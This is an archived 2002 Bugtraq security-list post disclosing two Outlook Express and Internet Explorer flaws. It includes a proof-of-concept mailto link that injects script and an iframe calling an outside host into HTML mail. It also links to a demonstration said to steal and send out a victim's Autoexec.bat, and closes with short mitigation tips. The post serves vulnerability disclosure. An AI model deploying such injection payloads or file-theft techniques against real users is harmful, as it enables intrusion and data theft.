[25056] in bugtraq
More fun with html mail: Outlook Express, Internet Explorer, Other etc
daemon@ATHENA.MIT.EDU (http-equiv@excite.com)
Mon Apr 15 12:38:42 2002
Message-Id: <200204142159.g3ELxD1v085757@mail2.megamailservers.com>
Date: Sun, 14 Apr 2002 21:59:13 -0000
To: <bugtraq@securityfocus.com>, <NTBugtraq@listserv.ntbugtraq.com>
From: "http-equiv@excite.com" <http-equiv@malware.com>
Cc: <vuln-dev@securityfocus.com>
Reply-To: http-equiv@malware.com
Sunday, April 14, 2002
1. Not Possible
Technically it cannot be possible to create an html mail message from
a mailto url scheme without user input. However shoe-horning html in
through insertion of script tags does make it possible. Default
installation of Outlook Express and probably Outlook, is 'mail
sending format: html':
<a href="mailto: freak@bloatedcorp.com
?cc=contest@bloatedcorp.com
&subject=Million Dollar Contest
&body=<script></script>
<iframe src=http://www.malware.com'>">
contest@bloatedcorp.com </a>
This is not a good idea.
Working Example:
http://www.malware.com/$illine$$.html
Note: this is an 8th month
old 'thing':http://www.securityfocus.com/bid/3334
2. EVEN WORSE:
Trivial file theft using Outlook Express, maybe Outlook. Instead of
delivering files to the target computer, we rather take files from
the target computer. With a bit of Idiot Engineering, we reverse the
process as detailed here: http://www.securityfocus.com/bid/1221 and
here: http://www.kb.cert.org/vuls/id/31994.
Note: now almost 24 months old.
Working Example:
This will pluck and send your Autoexec.bat from a default Windows
installation. Targeted computers with specific files can prove more
lucrative.
http://www.malware.com/idiot$.html
Notes:
1. Outlook Express 6 default mail is in the 'restricted zone'.
Outlook Express 5.5 isn't. Disable Active X and all those other
things.
2. Do not send 'unknown' webmasters entire web pages despite how
tempting the request is.
3. Scraping the bottom of the barrel.
End Call.
--
http://www.malware.com
